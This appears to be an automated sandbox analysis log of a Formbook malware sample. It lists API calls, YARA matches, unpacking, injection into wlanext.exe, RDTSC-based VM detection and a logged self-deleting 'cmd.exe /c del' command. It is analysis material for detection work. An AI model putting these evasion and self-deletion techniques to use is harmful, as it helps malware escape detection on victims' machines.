          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59610 NtEnumerateValueKey,1_2_00A59610
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59670 NtQueryInformationProcess,1_2_00A59670
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59650 NtQueryValueKey,1_2_00A59650
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59730 NtQueryVirtualMemory,1_2_00A59730
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5A710 NtOpenProcessToken,1_2_00A5A710
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59760 NtOpenProcess,1_2_00A59760
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A59770 NtSetInformationFile,1_2_00A59770
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A5A770 NtOpenThread,1_2_00A5A770
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004181C0 NtCreateFile,1_1_004181C0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_00418270 NtReadFile,1_1_00418270
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004182F0 NtClose,1_1_004182F0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004183A0 NtAllocateVirtualMemory,1_1_004183A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004181BA NtCreateFile,1_1_004181BA
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_0041826C NtReadFile,1_1_0041826C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004182EA NtClose,1_1_004182EA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849A50 NtCreateFile,LdrInitializeThunk,7_2_03849A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038499A0 NtCreateSection,LdrInitializeThunk,7_2_038499A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_03849910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849840 NtDelayExecution,LdrInitializeThunk,7_2_03849840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849860 NtQuerySystemInformation,LdrInitializeThunk,7_2_03849860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849780 NtMapViewOfSection,LdrInitializeThunk,7_2_03849780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849FE0 NtCreateMutant,LdrInitializeThunk,7_2_03849FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849710 NtQueryInformationToken,LdrInitializeThunk,7_2_03849710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038496D0 NtCreateKey,LdrInitializeThunk,7_2_038496D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038496E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_038496E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849650 NtQueryValueKey,LdrInitializeThunk,7_2_03849650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03849660
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038495D0 NtClose,LdrInitializeThunk,7_2_038495D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849540 NtReadFile,LdrInitializeThunk,7_2_03849540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384A3B0 NtGetContextThread,7_2_0384A3B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849B00 NtSetValueKey,7_2_03849B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849A80 NtOpenDirectoryObject,7_2_03849A80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849A00 NtProtectVirtualMemory,7_2_03849A00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849A10 NtQuerySection,7_2_03849A10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849A20 NtResumeThread,7_2_03849A20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038499D0 NtCreateProcessEx,7_2_038499D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849950 NtQueueApcThread,7_2_03849950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038498A0 NtWriteVirtualMemory,7_2_038498A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038498F0 NtReadVirtualMemory,7_2_038498F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849820 NtEnumerateKey,7_2_03849820
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384B040 NtSuspendThread,7_2_0384B040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038497A0 NtUnmapViewOfSection,7_2_038497A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384A710 NtOpenProcessToken,7_2_0384A710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849730 NtQueryVirtualMemory,7_2_03849730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849760 NtOpenProcess,7_2_03849760
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384A770 NtOpenThread,7_2_0384A770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849770 NtSetInformationFile,7_2_03849770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849610 NtEnumerateValueKey,7_2_03849610
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849670 NtQueryInformationProcess,7_2_03849670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_038495F0 NtQueryInformationFile,7_2_038495F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849520 NtWaitForSingleObject,7_2_03849520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0384AD30 NtSetContextThread,7_2_0384AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_03849560 NtWriteFile,7_2_03849560
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010481C0 NtCreateFile,7_2_010481C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010483A0 NtAllocateVirtualMemory,7_2_010483A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01048270 NtReadFile,7_2_01048270
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010482F0 NtClose,7_2_010482F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010481BA NtCreateFile,7_2_010481BA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104826C NtReadFile,7_2_0104826C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010482EA NtClose,7_2_010482EA
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0380B150 appears 35 times
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: String function: 00A1B150 appears 35 times
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: String function: 0041A0A0 appears 38 times
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 1cec9342_by_Libranalysis.exe, 00000000.00000003.645430584.000000001EEAF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1cec9342_by_Libranalysis.exe
          Source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693898854.0000000000C9F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 1cec9342_by_Libranalysis.exe
          Source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693999734.0000000000D72000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs 1cec9342_by_Libranalysis.exe
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@14/9
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3980:120:WilError_01
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile created: C:\Users\user\AppData\Local\Temp\nsz26A1.tmp
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: 1cec9342_by_Libranalysis.exeVirustotal: Detection: 54%
          Source: 1cec9342_by_Libranalysis.exeMetadefender: Detection: 20%
          Source: 1cec9342_by_Libranalysis.exeReversingLabs: Detection: 82%
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile read: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
          Source: unknownProcess created: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: 1cec9342_by_Libranalysis.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.919087839.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 1cec9342_by_Libranalysis.exe, 00000000.00000003.645751865.000000001EC00000.00000004.00000001.sdmp, 1cec9342_by_Libranalysis.exe, 00000001.00000002.693732282.0000000000B0F000.00000040.00000001.sdmp, wlanext.exe, 00000007.00000002.907697091.00000000037E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 1cec9342_by_Libranalysis.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693987573.0000000000D60000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693987573.0000000000D60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.919087839.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeUnpacked PE file: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0040102D pushfd ; ret 1_2_0040102E
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004160CD push 00000033h; iretd 1_2_004160F6
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004161E9 push es; retf 1_2_00416257
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041624E push es; retf 1_2_00416257
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041B3B5 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041B46C push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041B402 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041B40B push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00418F45 push es; ret 1_2_00418F4B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_0041CFEE push dword ptr [C5AA8973h]; retn EADCh1_2_0041D044
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_00A6D0D1 push ecx; ret 1_2_00A6D0E4
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_0040102D pushfd ; ret 1_1_0040102E
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004160CD push 00000033h; iretd 1_1_004160F6
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_004161E9 push es; retf 1_1_00416257
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_1_0041624E push es; retf 1_1_00416257
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0385D0D1 push ecx; ret 7_2_0385D0E4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010461E9 push es; retf 7_2_01046257
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_010460CD push 00000033h; iretd 7_2_010460F6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104C381 pushad ; retf 7_2_0104C382
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104B3B5 push eax; ret 7_2_0104B408
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104624E push es; retf 7_2_01046257
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104B402 push eax; ret 7_2_0104B408
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104B40B push eax; ret 7_2_0104B472
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_0104B46C push eax; ret 7_2_0104B472
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 7_2_01048F45 push es; ret 7_2_01048F4B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile created: C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000010385E4 second address: 00000000010385EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 000000000103897E second address: 0000000001038984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Windows\explorer.exe TID: 7036Thread sleep time: -55000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 5012Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: explorer.exe, 00000004.00000002.918922090.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
